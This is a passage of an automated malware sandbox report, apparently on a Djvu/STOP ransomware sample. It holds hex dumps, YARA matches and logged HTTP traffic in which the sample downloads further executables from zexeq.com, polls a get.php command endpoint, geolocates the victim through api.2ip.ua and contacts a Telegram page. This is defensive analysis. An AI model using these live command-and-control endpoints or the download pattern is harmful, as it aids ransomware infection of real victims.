                                                                                                                                                                      Data Ascii: [UV5DDuQYYDD^]5DDYU]U5DDYt]j:Y]s3PPPPPU]UE3;`DtA-rHwjX]`D]DjY;#]0uHbDuLbDU
                                                                                                                                                                      Jan 12, 2024 06:48:02.065429926 CET1286INData Raw: 39 3d 24 f0 44 00 74 33 56 e8 8b 16 00 00 59 85 c0 0f 85 72 ff ff ff 8b 45 10 3b c7 0f 84 50 ff ff ff c7 00 0c 00 00 00 e9 45 ff ff ff 33 ff 8b 75 0c 6a 04 e8 fc 37 00 00 59 c3 3b df 75 0d 8b 45 10 3b c7 74 06 c7 00 0c 00 00 00 8b c3 e8 74 0c 00
                                                                                                                                                                      Data Ascii: 9=$Dt3VYrE;PE3uj7Y;uE;ttUu Du]e]UV5TbD5 Dt!PbDtP5TbDt'"DV DuVYth"DP4 DtuEE^]jYUV5Tb
                                                                                                                                                                      Jan 12, 2024 06:48:02.065501928 CET1286INData Raw: fb ff ff 59 ff d0 ff 75 08 e8 78 fe ff ff a1 54 62 44 00 83 f8 ff 74 09 6a 00 50 ff 15 98 20 44 00 5d c3 ff 25 a8 20 44 00 ff 25 b0 20 44 00 8b ff 56 57 be b8 22 44 00 56 ff 15 14 20 44 00 85 c0 75 07 56 e8 82 03 00 00 59 8b f8 85 ff 0f 84 5e 01
                                                                                                                                                                      Data Ascii: YuxTbDtjP D]% D% DVW"DV DuVY^54 Dh#DWh"DWHDh"DWLDh"DWPD=HD5 DTDt=LDt=PDtu$ DLD DHD4@5PDTD DTbD5LDP


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      3192.168.2.449735175.120.254.9807608C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Jan 12, 2024 06:48:04.269814014 CET94OUTGET /files/1/build3.exe HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: zexeq.com


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      4192.168.2.449739175.120.254.9807608C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Jan 12, 2024 06:48:06.586731911 CET137OUTGET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: zexeq.com


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      5192.168.2.449740175.120.254.9807596C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Jan 12, 2024 06:48:06.593430042 CET126OUTGET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: zexeq.com


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      6192.168.2.449744175.120.254.9807608C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Jan 12, 2024 06:48:12.744860888 CET137OUTGET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: zexeq.com


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      7192.168.2.449746175.120.254.9807596C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Jan 12, 2024 06:48:12.962877035 CET126OUTGET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: zexeq.com


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      8192.168.2.449757175.120.254.9807608C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Jan 12, 2024 06:48:18.402801037 CET137OUTGET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: zexeq.com


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      9192.168.2.449758175.120.254.9807596C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      Jan 12, 2024 06:48:18.551820993 CET126OUTGET /test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: zexeq.com


                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      0192.168.2.449729172.67.139.2204437496C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-01-12 05:47:55 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                      2024-01-12 05:47:55 UTC887INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 12 Jan 2024 05:47:55 GMT
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pW4vFvfVXn93nV5ceriJdXEobEXNdFbqL4G62%2BBgUeaYWBlWOKe24w62GyAM8yJyK9SNfxFwXkk%2BhjT9Ur7Qs9fQ01jriNmtuGr2A0SSqELjJt7mZdGmATAb7Soi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 84431b851ec50817-IAD
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      2024-01-12 05:47:55 UTC433INData Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                                                                      Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                                                                      2024-01-12 05:47:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      1192.168.2.449730172.67.139.2204437608C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-01-12 05:47:56 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                      2024-01-12 05:47:57 UTC891INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 12 Jan 2024 05:47:57 GMT
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4sL666jJxAh3LnzXDm1cw7Zlbfx8iIioBqlHWZvPPuFjXmu%2FCCr1GTeJxH13Vk5Ti6MtSGBi2dqpBeJW%2FCWhavLTU3ul8htCzkVmZjCys%2FqJVqSjipDaOjW4oaj%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 84431b9129d70802-IAD
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      2024-01-12 05:47:57 UTC433INData Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                                                                      Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                                                                      2024-01-12 05:47:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      2192.168.2.449731172.67.139.2204437596C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-01-12 05:47:57 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                      2024-01-12 05:47:57 UTC887INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 12 Jan 2024 05:47:57 GMT
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v4E43GG0xu4HutJT5gLwjjykOAk14vXqf%2F7z73dlTKjl%2Fdt67nk4u8cXlo3YtKirwwAgALyeDEK8HjphHhbzpQuH2kGn5ck2UDJjAwjoyxUSXTS5N3Fk97sEkkoL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 84431b92aeae2093-IAD
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      2024-01-12 05:47:57 UTC433INData Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                                                                      Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                                                                      2024-01-12 05:47:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      3192.168.2.449736149.154.167.994437772C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-01-12 05:48:04 UTC86OUTGET /bg3goty HTTP/1.1
                                                                                                                                                                      Host: t.me
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-01-12 05:48:05 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Fri, 12 Jan 2024 05:48:05 GMT
                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                      Content-Length: 12339
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: stel_ssid=2f1c8a115f301e78ef_2296380738082918008; expires=Sat, 13 Jan 2024 05:48:05 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                      Cache-control: no-store
                                                                                                                                                                      X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                      Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                      Strict-Transport-Security: max-age=35768000
                                                                                                                                                                      2024-01-12 05:48:05 UTC12339INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 62 67 33 67 6f 74 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e
                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @bg3goty</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      4192.168.2.449745172.67.139.2204437872C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-01-12 05:48:12 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                      2024-01-12 05:48:13 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 12 Jan 2024 05:48:13 GMT
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vXz6wPnNTz2u8xVUP5vvjA6ax8Z6wQ4pwPEOQddH4k91g54COS36tVXeSESxekLXM58hfA%2FcXWSB6gchHw5GmZckOVL6f%2BdbW0KcYPa5qCNL0tncyrAmJv%2FNg329"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 84431bf52bde57d0-IAD
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      2024-01-12 05:48:13 UTC433INData Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                                                                      Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                                                                      2024-01-12 05:48:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      5192.168.2.449762172.67.139.2204437256C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-01-12 05:48:21 UTC85OUTGET /geo.json HTTP/1.1
                                                                                                                                                                      User-Agent: Microsoft Internet Explorer
                                                                                                                                                                      Host: api.2ip.ua
                                                                                                                                                                      2024-01-12 05:48:21 UTC893INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Fri, 12 Jan 2024 05:48:21 GMT
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      strict-transport-security: max-age=63072000; preload
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-xss-protection: 1; mode=block; report=...
                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                      access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                                                                                                      access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=liX%2Ba2MpRuoDX%2BWGCUi1CaZmZlGoAchQrY51jVm3XjGlVQQzaiogarTBBbHZM%2BxvD8Tkcu%2FdtAWVAGr%2BVDntyi2nd2gpTWwhaQv0CGwWePWHfJcwA7XKFxmE5d51"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                      CF-RAY: 84431c28ab1f2427-IAD
                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                      2024-01-12 05:48:21 UTC433INData Raw: 31 61 61 0d 0a 7b 22 69 70 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 32 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 63 6f 6c 75 6d 62 69 61 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 32 5c 75 30 34 33 30 5c 75 30 34 34 38 5c 75 30 34 33 38 5c 75 30 34 33 64 5c 75 30 34 33 33 5c 75 30 34 34 32 5c 75 30 34 33 65 5c 75 30 34 33 64 22 2c
                                                                                                                                                                      Data Ascii: 1aa{"ip":"102.165.48.42","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"District of columbia","region_rus":"\u0412\u0430\u0448\u0438\u043d\u0433\u0442\u043e\u043d",
                                                                                                                                                                      2024-01-12 05:48:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:06:47:53
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Imagebase:0xb90000
                                                                                                                                                                      File size:1'150'976 bytes
                                                                                                                                                                      MD5 hash:3EEB7B2030517F91FDF0F4C5278D8E76
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000003.1662696538.0000000003391000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000003.1662696538.0000000003391000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1645947470.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000002.1668112106.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000000.00000000.1646052192.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000000.00000000.1646052192.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:1
                                                                                                                                                                      Start time:06:47:55
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                      Wow64 process (32bit):true
